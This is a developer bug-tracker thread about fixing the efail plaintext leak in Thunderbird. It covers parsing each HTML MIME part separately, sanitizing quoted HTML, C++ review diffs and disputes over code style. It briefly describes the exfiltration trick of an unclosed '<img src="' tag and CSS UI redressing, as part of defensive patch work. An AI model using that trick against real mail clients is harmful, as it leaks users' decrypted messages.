For the test message I attached, this works great! The decoded text becomes clearly visible in the composition.

However, forced general sanitisation of all quotes is not really acceptable. It destroys HTML replies for all users.

Can you please include a check whether the sanitisation is necessary? That's the tricky part, but you're on the right track.

Not sure whether this should be an f+ for the initiative and the promising approach or an f- for destroying things for everyone :-(
Attachment #8976054 - Flags: feedback-
Comment on attachment 8976050 [details] [diff] [review]
Sanitize quoted HTML

Missing commit message.
Superfluous variables.
Good approach, but too drastic since it affects HTML quoting for all users.
But I think we're not far off. Waiting for the next round.
Attachment #8976050 - Flags: review-
Attachment #8973795 - Attachment is obsolete: true
(In reply to Ben Bucksch (:BenB) from comment #57)
> 2. Sanitize quoted HTML
> 
> The composer is more vulnerable than the viewer. In the viewer, we assume
> malicious code and harden against it. Not so in the composer, which assumes
> that the user enters the data.

That used to be the case, but not so in 52 and above. The composer no is no longer treated differently (as an EDITOR).
Comment on attachment 8976050 [details] [diff] [review]
Sanitize quoted HTML

Review of attachment 8976050 [details] [diff] [review]:
-----------------------------------------------------------------

Yeah, I agree replying with basic html for everyone is too drastic.

It should also not be necessary if the other parts you mention are implemented.
Attachment #8976050 - Flags: review?(mkmelin+mozilla)
Maybe the code in mailnews/mime/src/mimecryp.cpp can tell us whether anything was decrypted while preparing the quote. I haven't looked. To find the right hook here would be the detective task. Sadly I don't know how it hangs together.
(In reply to Ben Bucksch (:BenB) from comment #57)
> 1. Separate MIME parts from each other
> Together, we had the idea of running the HTML document through the HTML
> parser. The parser will clean up the HTML and close any open tags and
> attributes and the serializer will output a complete HTML document. That
> avoids that we end the MIME part with <img src=" and stops this attack cold.

I agree this is what's need to be done. It's not clear from your comment, but *each html part* should be run separately through the parser and re-serialized out - this makes sure there are no unclosed elements and other strangeness. After that you can keep the outputs it all together as one chunk again and let the parser figure out the final document. 

If you can figure out where to do that, the bug is solved.
> *each html part* should be run separately through the parser and re-serialized out

Yes, that's the plan.

I've got a fix. Coming.
> replying with basic html for everyone is too drastic.

We can't allow these kinds of bugs to continue. This is not the first, I remember we had a similar bug not too long ago where stuff ran only on reply and caused a security problem. That one was not about encryption.
This implements a new MIME class that is now used for normal HTML parts (unless you use the sanitizer). It takes the HTML source text, runs it through the Geclp HTML parser, and then immediately serializes it out again. That ensures that all tags and attributes are closed and the HTML is syntactically correct.

This happens for every MIME part with HTML. This should fix the main bug here.

I've been working on this all night long.

Thanks to smaug for lots of help with the DOM APIs. Main problem is that many APIs are now removed. Indeed, the DOM Parser API is also removed, but there's a replacement API in 61, I've noted that as comment in the code. This patch is for 52 and should also work more or less for 60.
Can you start a try run?
Attached patch Sanitizer code cleanup (obsolete) — Splinter Review
This cleans up the Sanitizer class code a little bit.
Not related to the bug at all. But found while I was working on the previous patch. I separated it for ease of review.
Attachment #8976085 - Flags: review?(mkmelin+mozilla)
Attachment #8976074 - Flags: review?(mkmelin+mozilla)
Attached patch Sanitize quoted HTML, v3 (obsolete) — Splinter Review
Attachment #8976050 - Attachment is obsolete: true
Attachment #8976054 - Attachment is obsolete: true
Comment on attachment 8976085 [details] [diff] [review]
Sanitizer code cleanup

1. I removed the pref migration code, because that migration happened in 2012 and it should be long done. Even then, it only concerned users who had manually modified that pref. I think that was only a dozen users world-wide even back then, so that's surely useless code now.

2. Removed my debug code

3. Renamed one variable to be clearer

4. Moved the comment from the header to the implemetation file.

5. If you allow presentational stuff, then also allow CSS. That's the only logic change here. The change only affects users who manually changed this hidden pref. Again, only a handful users, probably.
Comment on attachment 8976086 [details] [diff] [review]
Sanitize quoted HTML, v3

Why are you attaching this again? I had already attached the very same patch but with a commit message in attachment 8976054 [details] [diff] [review]. I thought we had agreed that this was too drastic.
Comment on attachment 8976085 [details] [diff] [review]
Sanitizer code cleanup

Thanks for the clean-up, looks good.
Attachment #8976085 - Flags: review+
Comment on attachment 8976074 [details] [diff] [review]
Separate MIME parts from each other (for 52)

Review of attachment 8976074 [details] [diff] [review]:
-----------------------------------------------------------------

::: mailnews/mime/src/mimeTextHTMLParsed.cpp
@@ +36,5 @@
> +MimeDefClass(MimeInlineTextHTMLParsed, MimeInlineTextHTMLParsedClass,
> +       mimeInlineTextHTMLParsedClass, &MIME_SUPERCLASS);
> +
> +static int MimeInlineTextHTMLParsed_parse_line (const char *, int32_t,
> +                                                   MimeObject *);

Nit: Indentation.

@@ +71,5 @@
> +     I'll just dump the charset we get in the mime headers into a
> +     HTML meta http-equiv.
> +     XXX Not sure, if that is correct, though. */
> +  char *content_type =
> +    (obj->headers

Nit: That can go onto the previous line.

@@ +118,5 @@
> +  nsString& rawHTML = *(me->complete_buffer);
> +  nsString parsed;
> +
> +  nsCOMPtr<nsIDOMDocument> document;
> +  // in 61: RefPtr<mozilla::dom::DOMParser> parser = mozilla::dom::DOMParser::CreateWithoutGlobal(rv2); <https://searchfox.org/comm-central/source/mailnews/import/winlivemail/nsWMUtils.cpp#143>

Nit: This line is really too long.

Can you please prepare a patch that works on current trunk. We'll worry about the branches later.

If you want to be nice, please put:
#if 1
  // Code for Gecko 61 and beyond:
  RefPtr<mozilla::dom::DOMParser> parser = mozilla::dom::DOMParser::CreateWithoutGlobal(rv2);
#else
  // Code for Gecjo 60 and below:
  nsCOMPtr<nsIDOMParser> parser = do_GetService(NS_DOMPARSER_CONTRACTID);
#endif

@@ +124,5 @@
> +  nsresult rv = parser->ParseFromString(rawHTML.get(), "text/html", getter_AddRefs(document));
> +  NS_ENSURE_SUCCESS(rv, -1);
> +
> +  nsCOMPtr<nsIDocumentEncoder> encoder = do_CreateInstance(
> +      "@mozilla.org/layout/documentEncoder;1?type=text/html");

Nit: Indentation.

@@ +138,5 @@
> +  // needs the entire doc to make sense of the glibberish that people write.
> +
> +  NS_ConvertUTF16toUTF8 resultCStr(parsed);
> +  status = ((MimeObjectClass*)&MIME_SUPERCLASS)->parse_line(
> +                             resultCStr.BeginWriting(),

Nit: Indentation, perhaps the first argument fits onto the previous line, then align under it.
Comment on attachment 8976085 [details] [diff] [review]
Sanitizer code cleanup

Can you please rebase this for trunk.
Comment on attachment 8976085 [details] [diff] [review]
Sanitizer code cleanup

Review of attachment 8976085 [details] [diff] [review]:
-----------------------------------------------------------------

::: mailnews/mime/src/mimemoz2.cpp
@@ +2201,5 @@
>      &dropMedia);
>    if (dropPresentational)
>      flags |= nsIParserUtils::SanitizerDropNonCSSPresentation;
> +  else
> +    flags |= nsIParserUtils::SanitizerAllowStyle;

I thought no-styles was a feature for this particular code...
Attachment #8976085 - Flags: review?(mkmelin+mozilla) → review+
Ben, can you please provide patches that compile on trunk. I've fixed this and I also addressed the style nits.

I've also included the code for TB 60 and below (untested).
Attachment #8976074 - Attachment is obsolete: true
Attachment #8976074 - Flags: review?(mkmelin+mozilla)
Attachment #8976330 - Flags: review?(mkmelin+mozilla)
> Ben, can you please provide patches that compile on trunk.

My focus right now was TB 52.8.0, because that needs to get out the door. The APIs are different, as you are painfully aware.

(And also because Enigmail failed on trunk for me, and 60 crashed on startup.) 

Thanks for the update to trunk.
Attachment #8976074 - Attachment is obsolete: false
Attachment #8976074 - Attachment description: Separate MIME parts from each other → Separate MIME parts from each other (for 52)
> I thought we had agreed that this was too drastic.

You and Magnus simply stated that. I never said that I agree. Both Patrick and me think that this is the way to go.

But I had an idea: The sanitizer is drastic also on presentational HTML, which is not required for security. I can drive the sanitizer in a mode that removes all the stuff potentially problematic for security, but keep presentational HTML like tables and <font> and CSS.

How about that?
> I thought no-styles was a feature for this particular code...

It's only a secondary feature of the sanitizer, not the primary one. There's an existing pref for it, and with this code, the style would be enabled based on that pref. See point 5 of comment 73. I could rename the pref to be clearer, though, if you like?
At least on my test e-mail (attachment 8975458 [details]) this works well.

We certainly need to get a try run for this, so updating it to trunk, painfully, since I've done all those ports myself, even the one in nsWMUtils.cpp. In fact, I asked Boris to provide a C++ interface which was created only for use in TB and can break any minute, since there is no test for it. Someone needs to write a gtest, if we're using this now in a central location and not just some "Windows Live Mail" import. See bug 1454842 comment #13.

Here's your try:
https://treeherder.mozilla.org/#/jobs?repo=try-comm-central&revision=19011e85f65069e35ffee58745a69f5d085b4ad2
(In reply to Ben Bucksch (:BenB) from comment #81)
> But I had an idea: The sanitizer is drastic also on presentational HTML,
> which is not required for security. I can drive the sanitizer in a mode that
> removes all the stuff potentially problematic for security, but keep
> presentational HTML like tables and <font> and CSS.
> 
> How about that?
Is this still required? With the MIME patch I see the fully decrypted part, so I'd be pretty foolish to quote that. Why do you still need sanitising? If you do, of course it needs to be done in a way that the rendered page looks the same with and without sanitising.
Comment on attachment 8976330 [details] [diff] [review]
Separate MIME parts from each other (for trunk)

>+  char *content_type = obj->headers ?
>+     MimeHeaders_get(obj->headers, HEADER_CONTENT_TYPE, false, false) : 0;

A style nit of my own:
The notation
    result = some_long_condition()
      ? if_yes()
      : otherwise();
is important for readability. Esp. so as the expressions get more complex, like here.

If it all fits in a single line |foo = works ? 1 : 0;|, that's fine, but if it's complex enough that you add a linebreak, then true and false results should be on their own lines. Much like if clauses, really.
> Why do you still need sanitising?

As a safety measure.

I am not just looking to fix this exact bug and PoC, but all bugs of this nature. That's the only way to ever get an application secure.
This addresses Jörg's review comments.

(NIT: If I wrap lines, I indent it 4 spaces, not just 2, to clearly distinguish from indented blocks. But on your request, I adapted it, although I find it less readable.)

Thanks, Jörg, for testing this on trunk. I incorporated your trunk changes in my patch. I've made it default to 52, so that it compiles here and so that we can land it on 52 branch, but before landing on trunk, I'd remove the TB52/to code and #ifdef.

Jörg: Given that you did the review, and tested it, can you r+ it, please?
Attachment #8976074 - Attachment is obsolete: true
Attachment #8976330 - Attachment is obsolete: true
Attachment #8976330 - Flags: review?(mkmelin+mozilla)
Attachment #8976349 - Flags: review?(mkmelin+mozilla)
Attached patch Sanitizer code cleanup, v2 (obsolete) — Splinter Review
Attachment #8976351 - Flags: review?(mkmelin+mozilla)
Comment on attachment 8976349 [details] [diff] [review]
Separate MIME parts from each other, v4 (trunk and 52)

Review of attachment 8976349 [details] [diff] [review]:
-----------------------------------------------------------------

Please fix the test failures:
https://treeherder.mozilla.org/#/jobs?repo=try-comm-central&revision=19011e85f65069e35ffee58745a69f5d085b4ad2&selectedJob=178863090

This can't land neither on 52 nor on 62 if it causes test failures.

::: mailnews/mime/src/mimeTextHTMLParsed.cpp
@@ +36,5 @@
> +#define MIME_SUPERCLASS mimeInlineTextHTMLClass
> +MimeDefClass(MimeInlineTextHTMLParsed, MimeInlineTextHTMLParsedClass,
> +             mimeInlineTextHTMLParsedClass, &MIME_SUPERCLASS);
> +
> +static int MimeInlineTextHTMLParsed_parse_line (const char *, int32_t,

Please remove the space before the parenthesis, and three below.

@@ +45,5 @@
> +
> +static int
> +MimeInlineTextHTMLParsedClassInitialize(MimeInlineTextHTMLParsedClass *clazz)
> +{
> +  MimeObjectClass *oclass = (MimeObjectClass *) clazz;

Please remove the space after the parenthesis.

@@ +58,5 @@
> +
> +static int
> +MimeInlineTextHTMLParsed_parse_begin (MimeObject *obj)
> +{
> +  MimeInlineTextHTMLParsed *me = (MimeInlineTextHTMLParsed *) obj;

And here.

@@ +66,5 @@
> +    return status;
> +
> +  // charset
> +  // dump the charset we get from the mime headers into a HTML <meta http-equiv>
> +  char *content_type = (obj->headers

Lose the opening parenthesis.

@@ +68,5 @@
> +  // charset
> +  // dump the charset we get from the mime headers into a HTML <meta http-equiv>
> +  char *content_type = (obj->headers
> +     ? MimeHeaders_get(obj->headers, HEADER_CONTENT_TYPE, false, false)
> +     : 0);

Lose the closing parenthesis.

I fixed all that, but you lost the changes :-(

@@ +121,5 @@
> +  mozilla::ErrorResult rv2;
> +  RefPtr<mozilla::dom::DOMParser> parser =
> +    mozilla::dom::DOMParser::CreateWithoutGlobal(rv2);
> +  nsCOMPtr<nsIDocument> document = parser->ParseFromString(
> +    rawHTML, mozilla::dom::SupportedType::Text_html, rv2);

Please reformat to:
nsCOMPtr<nsIDocument> document =
  parser->ParseFromString(rawHTML, mozilla::dom::SupportedType::Text_html, rv2);
Which I had, but you lost :-(

@@ +134,5 @@
> +#endif
> +
> +  // Serialize it back to HTML source again
> +  nsCOMPtr<nsIDocumentEncoder> encoder = do_CreateInstance(
> +    "@mozilla.org/layout/documentEncoder;1?type=text/html");

Please reformat to:
nsCOMPtr<nsIDocumentEncoder> encoder =
  do_CreateInstance("@mozilla.org/layout/documentEncoder;1?type=text/html");

@@ +150,5 @@
> +  return status;
> +}
> +
> +void
> +MimeInlineTextHTMLParsed_finalize (MimeObject *obj)

Lose space.

@@ +165,5 @@
> +  ((MimeObjectClass*)&MIME_SUPERCLASS)->finalize (obj);
> +}
> +
> +static int
> +MimeInlineTextHTMLParsed_parse_line (const char *line, int32_t length,

Lose the space before the parenthesis.
Attachment #8976349 - Flags: review-
Comment on attachment 8976351 [details] [diff] [review]
Sanitizer code cleanup, v2

Review of attachment 8976351 [details] [diff] [review]:
-----------------------------------------------------------------

::: mailnews/mailnews.js
@@ +588,5 @@
>  // For the next 4 prefs, see <http://www.bucksch.org/1/projects/mozilla/108153>
>  pref("mailnews.display.prefer_plaintext", false);  // Ignore HTML parts in multipart/alternative
>  pref("mailnews.display.html_as", 0);  // How to display HTML/MIME parts. 0 = Render the sender's HTML; 1 = HTML->TXT->HTML; 2 = Show HTML source; 3 = Sanitize HTML; 4 = Show all body parts
>  pref("mailnews.display.show_all_body_parts_menu", false); // Whether the View > Message body as > All body parts menu item is available
> +pref("mailnews.display.html_sanitizer.drop_presentational", true); // whether to drop <font>, <center>, align='...', etc.

Please don't change prefs unless you want to write migration code.

::: mailnews/mime/src/mimemoz2.cpp
@@ +2160,5 @@
>    return NS_OK;
>  }
>  
> +
> +

Please don't add these lines.

::: mailnews/mime/src/mimethsa.cpp
@@ +123,2 @@
>  
> +  // Write it out

Full stop missing.
Does the HTML sanitization work touch on the CSS issues mentioned in the efail paper at chapter 3.1, where it briefly discusses a CSS redressing attack? I want to make sure that any CSS issues there aren't slipping by the updated sanitizer for simple HTML. (I don't understand this specific aspect of the attack but it was pointed out to me.)
Flags: needinfo?(ben.bucksch)
Attached patch Sanitize quotes, v4 (for 52) (obsolete) — Splinter Review
OK, so for the quote sanitation, I have good news and bad news.

The good news is that if I enable presentational HTML and styles, the result looks the same to me as without sanitation. (There might be minor differences, but I haven't noticed any.) So, this does look like we could ship this as default for everybody. It would remove a whole class of attacks.

The bad news is that the Gecko HTML sanitizer is not able to remove URL references from CSS rules/styles. The sanitizer I had written back in 2004 could do that, but the rewrite by Henri cannot, unfortunately. He was aware of that, and that's why he has an |if| that disables all CSS (althogether, even the innocent rules), if I say that I don't want external resources.

We should later add support to remove external URLs from CSS. But right now, we have no sanitation at all and allow flat out everything, so this is no worse than before.

I've made a band-aid fix that removes that |if|. The caller can still control it, because the allowStyles has its own flag. Thunderbird and DirectorySericeProvider are the only users of this sanitizer, and all callers set AllowStyles properly, so removing that automatic is not a concrete problem, and fixes the issue The only problem is that I'd need to patch Gecko.

Anyway, the patch as attached works, and is a massive improvement over status quo. I don't see any drawbacks. I'll attach a screenshot.
Flags: needinfo?(ben.bucksch)
(In reply to Ben Bucksch (:BenB) from comment #86)
> > Why do you still need sanitising?
> As a safety measure.
> I am not just looking to fix this exact bug and PoC, but all bugs of this
> nature. That's the only way to ever get an application secure.
OK, perhaps we could then lose this:
https://hg.mozilla.org/releases/comm-esr52/rev/eec7161f761fbd8b66527d857b0657743128406f#l1.13
> Please don't change prefs unless you want to write migration code.

This is a hidden preference. Very few users know will use it. We change the behavior of it, and to the better (for that user group). The users who set this will immediately notice, look up, and be happy that we've made it more useful now. I don't think that effects more than a dozen users world-wide, frankly.

> Full stop missing.

Single phrases in comments don't get full stops, like in the UI. See e.g. mimemoz2.h and many other files.

> Lose the space before the parenthesis.

This is the libmime style. It's like that *everywhere*. I didn't change this.

> Please reformat to:
> Which I had, but you lost :-(
> I fixed all that, but you lost the changes :-(

The style matches the existing libmime code.

> Please don't add these lines.

OK, can remove them.

But I'd rather focus on the security bugs.
> OK, perhaps we could then lose this:
> https://hg.mozilla.org/releases/comm-esr52/rev/eec7161f761fbd8b66527d857b0657743128406f#l1.13

heh!!

Yes, hopefully, that won't be necessary. I'd like to get these fixes in, though. Then we can talk about cleanup later.

I'd like to make sure that neither this particular attack, nor any other similar one will work in the future. Once a weakness is identified, that area has a mark on its back and security researchers will use that as idea and try the attack in other ways.
(In reply to Al Billings [:abillings] from comment #91)
> Does the HTML sanitization work touch on the CSS issues mentioned in the
> efail paper at chapter 3.1, where it briefly discusses a CSS redressing
> attack? I want to make sure that any CSS issues there aren't slipping by the
> updated sanitizer for simple HTML. (I don't understand this specific aspect
> of the attack but it was pointed out to me.)

I assume you refer to this phrase:
"... require user interaction.... in Thunderbird and Postbox we can completely redress the UI with CSS and trick the user into submitting the plaintext with an HTML form if he clicks somewhere into the message"

With "redress", I think he means to fake/mock TB UI in a message, to make the user click on it.

The mocking of UI has always been possible since images in mail exist, so that's not a bug in itself. If we do something nasty on click, that's a problem we should fix. And I think that's all they are trying to say here. I think they are solely trying to counter a hypothetical counter-argument of "Yes, it leaks confidential information, but only on user click, so it's not a problem". But we're not saying that, we're not discarding the problem, but trying to fix the problem of leaking the information in the first place, so the click itself into the message is not important. We do agree that this should not cause harm, and I think that's all they are trying to say here.

If the user clicks "Load remote content" in *our* UI, that's a different story. If the user does that, we can't prevent leaks, because the user specifically requested the external call. But that's not what they are talking about here.
Attached image Sanitize quotes, v2 vs. v4 - Screenshots (obsolete) —
This is a screenshot of:
* 1. Viewer, Original HTML
* 2. Composer, before (TB 58.7)
* 3. Composer, with patch v4, sanitizer, but allowing styles
* 4. Composer, with patch v2, full sanitation

As you can see, you see nothing :-) ...that is, no difference between 2. and 3.
That means that Sanitizer patch v4 makes no noticable changes to the quote result, even though the sanitizer ran over the quote and cleaned it from most problematic HTML.
Attachment #8976085 - Attachment is obsolete: true
Attachment #8976086 - Attachment is obsolete: true
(In reply to Ben Bucksch (:BenB) from comment #94)
Let's not discuss about style nits, you're wasting more time on the discussion than actually fixing them, or just picking up what I have already fixed.

I know that MIME is old code with a hotchpotch of ugliness and I am certainly opposed to adding more ugliness.

The style-guide says that all sentences get a full stop at the end, so it doesn't hurt to add them. There are pre-existing examples:
// SaveAs in new modes doesn't work yet.
/* Use the class we've got. */
/* Descend into messages only if we're looking for a specific sub-part. */
/* First initialize the superclass. */

We don't use spaces before parameter lists for the obvious reason of being able to search for functions with "XXX(". There are pre-existing cases of this in MIME, for example (at random):
mime_subclass_p(MimeObjectClass *child, MimeObjectClass *parent)
mime_imap_part_address(MimeObject *obj)

We don't use spaces after a cast, which you do correctly in your patch on some occasions:
int status = ((MimeObjectClass*)&MIME_SUPERCLASS)->parse_eof(obj, abort_p);

Because in the past no one enforced a consistent style in MIME we're at the mess we are now. So please no further discussion, just fix what I asked for. Correct style should be automatic and then you can focus on the actual problem.

Further comments on the tree patches presented:

"Sanitizer code cleanup, v2":
You misunderstood what a "hidden" preference is. The preference in question is listed in mailnews.js and therefore listed in about:config. We have real hidden preferences that don't show up there. It is also widely discussed on the web, please Google it. We even get complaints when changing real "hidden" preferences (last for mail.ui.display.dateformat.thisweek and friends). So I don't think it's a good idea to change the name unless you offer some migration, which is easy to do:
https://dxr.mozilla.org/comm-central/source/mail/base/modules/mailMigrator.js
Also please present a patch that applies to trunk.

"Sanitize quotes, v4 (for 52)":
I haven't tried this but I'd like to hear how you plan to go about the M-C change included in the patch. Are you going to present this for review in M-C. Once landed in trunk, we could then uplift it to our branches. We usually don't take patches are not in M-C and don't have a plan to ever get there. In general, rules for all contributors to Mozilla code apply to you as well: So please don't mix hunks from different repositories in the same patch, since by definition the patch already doesn't apply and needs manual intervention by all people working on it. Please supply patches with proper HG headers stating your user and a decent commit message. This is essential even earlier on, for example for try pushes.

"Separate MIME parts from each other, v4 (trunk and 52)"
That looks promising, I haven't reviewed it yet, I've just flagged some obvious style issues, made it apply to trunk and shipped it off to try. Please address the test failures:
TEST-UNEXPECTED-FAIL | comm/mailnews/db/gloda/test/unit/test_mime_attachments_size.js
TEST-UNEXPECTED-FAIL | comm/mailnews/db/gloda/test/unit/test_mime_emitter.js

I'm not happy to distribute code to 10-25 million users where the own author added this comment:
+  /* honestly, I don't know how that charset stuff works in libmime.
+     The part in mimethtm doesn't make much sense to me either.
+     I'll just dump the charset we get in the mime headers into a
+     HTML meta http-equiv.
+     XXX Not sure, if that is correct, though. */
Maybe that needs further investigation since TB was riddled with charset issues (before I cleaned most/all of the up) and mojibake caused by wrong charset selection is not acceptable. Oh, I see, was copied from mimethsa.cpp, so perhaps you can include that comment in your clean-up.

As for the review: I haven't had time to actually understand what the patch does, perhaps you can explain it or point me to the comment where that was already explained. You're adding a new MIME class mimeInlineTextHTMLParsedClass and I see code that switches to using that new class. Can the old one mimeInlineTextHTMLClass be removed? Running with the patch, I see horizontal lines between the different parts now. Where do these get added? I think we need to add some class and CSS since currently they don't appear to have any margins/spacing and are just glued to the preceding text.

Final comment: Ben, I appreciate your expertise in this area and your contribution here. Please adhere to the rules that apply to everyone in the project to make collaboration as smooth as possible. I know you're working on an urgent security problem (or better, one that has finally become urgent), so we will need to cut some corners in the process but code formatting and covering all cases (see charset) won't be one of them.
Comment on attachment 8976363 [details] [diff] [review]
Sanitize quotes, v4 (for 52)

Review of attachment 8976363 [details] [diff] [review]:
-----------------------------------------------------------------

::: mailnews/compose/src/nsMsgCompose.cpp
@@ +617,5 @@
>  
> +/* This function syncronously sanitizes an HTML document (string->string)
> +   using the Gecko nsTreeSanitizer.
> +   This is a modified copy of the code in mimemoz2.cpp.
> +*/

This ugly comment style may be found in MIME, but we prefer not to have it in compose.

@@ +625,5 @@
> +  uint32_t flags = nsIParserUtils::SanitizerCidEmbedsOnly |
> +                   nsIParserUtils::SanitizerDropForms |
> +                   nsIParserUtils::SanitizerAllowStyle;
> +
> +  // Implementation in dom/base/nsTreeSanitizer.cpp

We have DXR to track this. So please lose the comment.

::: dom/base/nsTreeSanitizer.cpp
@@ -945,5 @@
>  {
> -  if (mCidEmbedsOnly) {
> -    // Sanitizing styles for external references is not supported.
> -    mAllowStyles = false;
> -  }

Please move this to a separate patch and get it reviewed by the appropriate peer. Or what is the plan for this hunk?
Additional comment: You said in comment #86 that sanitising is a safety measure. Should we move that to a different bug since this one here is quickly becoming confusing and the solution also needs an M-C change?
> I'm not happy to distribute code to 10-25 million users where the own author added this comment:

That's an old comment that I had copied. Turns out, that code apparently works fine since ~15 years for those 25 millions.
That's also why I removed it. You probably merely noticed the removal.

> Let's not discuss about style nits

Yes, so why do you?

> We don't use spaces before parameter lists

I know, normally, but not here. libmime is different. I was simply copying code as a template for my class.

<https://developer.mozilla.org/en-US/docs/Mozilla/Developer_guide/Coding_Style> says:
"The following norms should be followed for new code. For existing code, use the prevailing style in a file or module."

> I haven't had time to actually understand what the patch does
> I haven't reviewed it yet, I've just flagged some obvious style issues

That's the classic bikeshed <https://en.wikipedia.org/wiki/Law_of_triviality>.

I'd rather focus on how we can get the users as secure as possible.

I had spent the entire night coding this, to get this out as quickly as possible. I have already fixed a number of things you wanted fixed, including whitespace, and now you want more changes. It's one day later, and we're no closer.

I'd be happy to discuss the merits of the patch with you on the phone, and explain everything. As long as we agree to focus on securing end users.
(In reply to Ben Bucksch (:BenB) from comment #101)
> ...
> > I haven't had time to actually understand what the patch does
> > I haven't reviewed it yet, I've just flagged some obvious style issues
> 
> That's the classic bikeshed
> <https://en.wikipedia.org/wiki/Law_of_triviality>.
> 
> I'd rather focus on how we can get the users as secure as possible.
> 
> I had spent the entire night coding this, to get this out as quickly as
> possible. I have already fixed a number of things you wanted fixed,
> including whitespace, and now you want more changes. It's one day later, and
> we're no closer.

Bikeshed or not, Jorg's goal is to do a proper review. And if it's not done by Jorg then it will be someone else. So let's have the goal be not just security but a fully vetted patch.
(In reply to Ben Bucksch (:BenB) from comment #101)
> > Let's not discuss about style nits
> Yes, so why do you?
I was just doing a (pre-)review and you keep on discussing.

> <https://developer.mozilla.org/en-US/docs/Mozilla/Developer_guide/
> Coding_Style> says:
> "The following norms should be followed for new code. For existing code, use
> the prevailing style in a file or module."
Please read comment #98 again. I've copied examples from *existing* code that do it right. I don't have the time now to do a statistical analysis to see what's "prevailing". As far as I can tell, MIME is a mess, so we can just use "correct" style now.

> I had spent the entire night coding this, to get this out as quickly as
> possible. I have already fixed a number of things you wanted fixed,
> including whitespace, and now you want more changes. It's one day later, and
> we're no closer.
Ben, please read comment #98 again. There are rules that apply to anyone in Mozilla. You're not exempt, neither are other Mozilla luminaries, like Boris and Ehsan. The only difference it that when they are pointed at a nit, they just fix it. We're not closer to anything, since you submitted patches that don't apply to trunk, had no try run, no commit messages and mixed hunks from different repos. Who do you think should fix all this before landing?

> I'd be happy to discuss the merits of the patch with you on the phone, and
> explain everything. As long as we agree to focus on securing end users.
I prefer to document this in writing here.
Comment on attachment 8976351 [details] [diff] [review]
Sanitizer code cleanup, v2

r- due to ...

Formal reasons:
- Patch doesn't apply to trunk.
- No commit message.

Factual reasons:
- Not a good a idea to change preference names at 52.8.x or 52.9.x.
  The preference in question is publicised on the web.
- Would be OK to change for TB 60, but only with migration code
  (which is easy to do).
Attachment #8976351 - Flags: review-
Comment on attachment 8976363 [details] [diff] [review]
Sanitize quotes, v4 (for 52)

f- due to formal reasons:
- No commit message
- Mix of hunks for C-C and M-C
- Yes, it says "for 52", but doesn't help us. We need to land on
  trunk first, make sure all the tests pass, then uplift after
  maybe a short ride on beta.
Attachment #8976363 - Flags: feedback-
Comment on attachment 8976349 [details] [diff] [review]
Separate MIME parts from each other, v4 (trunk and 52)

Review of attachment 8976349 [details] [diff] [review]:
-----------------------------------------------------------------

Repeating from comment #98:
- This causes test failures.
- Not sure whether the new class completely replaces the old.
- Not sure where the horizontal lines come from. They would be OK if styled properly with margins/spacing.

::: mailnews/mime/src/mimei.cpp
@@ -328,5 @@
>    return
>       !(
>          (avoid_html
>           && (
> -              clazz == (MimeObjectClass *)&mimeInlineTextHTMLClass

Can the class whose usage you're removing be removed completely? If so, please do. If not, please explain in which cases which class is used.
Can you invitehanno@hboeck.de to this bug?
Why? He's a journalist and asked why this is progressing so slowly in an e-mail to the Council. I don't see any reason to add him here. So far, this is confidential, so I woudn't add a representative of the press.
He found a bypass for the current mitigation which may be interesting :)
Maybe he wants to file a new bug then. We're already at comment #110 here and the bug is getting more and more confusing.

If he found a bypass for (which?) current mitigation, then it doesn't belong here since this mitigation here wasn't shipped yet. Or did he apply the patches, compiled and then found that the specific solution proposed in the patches here doesn't work. Only then we're interested in this bug, anything else needs to go elsewhere.
> - Not sure whether the new class completely replaces the old.

Yes, it does. You can see 

- Not sure where the horizontal lines come from. They would be OK if styled properly with margins/spacing.

> > For existing code, use the prevailing style in a file or module.
> I don't have the time now to do a statistical analysis to see what's "prevailing". As far as I can tell, MIME is a mess

Simply open a random typical libmime file, like mimehdrs.cpp, mimethtm.cpp, mimeebod.cpp.
If I now start using a different style, as you ask me to, *that* would be a "mess".

::: mailnews/mime/src/mimei.cpp
@@ -328,5 @@
>          (avoid_html
>           && (
> -              clazz == (MimeObjectClass *)&mimeInlineTextHTMLClass

> Can the class whose usage you're removing be removed completely?

No, because it's the base class for this one here, and for the sanitizer.

Also, I would like to leave it in, in case we go back to straight pass-thought. I'll explain more to you in person why.

> He's a journalist and asked why this is progressing so slowly in an e-mail to the Council

He's got a point...

> > I'd be happy to discuss the merits of the patch with you on the phone, and
> > explain everything. As long as we agree to focus on securing end users.
> I prefer to document this in writing here.

I tried to reach you on the phone twice, but couldn't reach you.

This back and forth in async writing, and waiting for each answer for hours, takes too much time, both calendar time and my work time.

I'd like to get this finished. If we can work together on this, in realtime, we can get this done in a matter of 2-3 hours. We can't have this drag on like that. I neither have the time, nor can the users wait any longer. My offer to collaborate is there. You have my phone number.
Sorry, half finished comment:

> > - Not sure whether the new class completely replaces the old.

Yes, it does. You can see that in mimei.cpp. That's the switchboard class that decides which class implements what.

The only reference I left in is the "avoid" blacklist, and that's just a safety net.
Comment on attachment 8976351 [details] [diff] [review]
Sanitizer code cleanup, v2

Review of attachment 8976351 [details] [diff] [review]:
-----------------------------------------------------------------

I don't care much about the pref, but this (and other patches) need to apply to trunk. Yes we want to move as fast as possible, but patches need to land on trunk before elsewhere.
Attachment #8976351 - Flags: review?(mkmelin+mozilla)
(In reply to Jens Müller from comment #109)
> He found a bypass for the current mitigation which may be interesting :)

Could you file a new bug where you expand on this? You can use "Clone this bug" link below.
Flags: needinfo?(jens.a.mueller)
Comment on attachment 8976351 [details] [diff] [review]
Sanitizer code cleanup, v2

Actually, maybe it doesn't make sens to allow css for this use case. People chose to view Plain HTML and have to live with that it's not pretty.
Ben, to get positive review of the "Separate MIME parts from each other, v4 (trunk and 52)" patch, can you please address the test failures. The horizontal lines without margins/spacing are another *real* issue aside from the style discussion.

Please document what you have to say about the technical issues here. It needs to be documented. Phone calls are not the normal form of developer communication in Mozilla. Typically an issue can be settled within a day if all participants are in the same time zone and reply a few times during the day.
> Please document what you have to say about the technical issues here

Is there anything that you're missing in comment 57, which gives the big overview?
And the comments when I attached the patches, e.g. comment 69, comment 73 and comment 92 and comment 97?

> The horizontal lines

Honestly, I don't know where they come from, but they are not coming from my code.

> can you please address the test failures

It's not surprising that they fail, given that we intentionally change the output here.
I don't have the test suite set up, and last time I tried, it cost me a whole day to get it running. Could you please help me out there adapting the tests? That would be much appreciated.
Attached image tb-efail-attachment-separators.png (obsolete) —
> > The horizontal lines

> Honestly, I don't know where they come from

I found out. These are the inline attachment delimiters that Thunderbird always puts between the different documents/attachments.

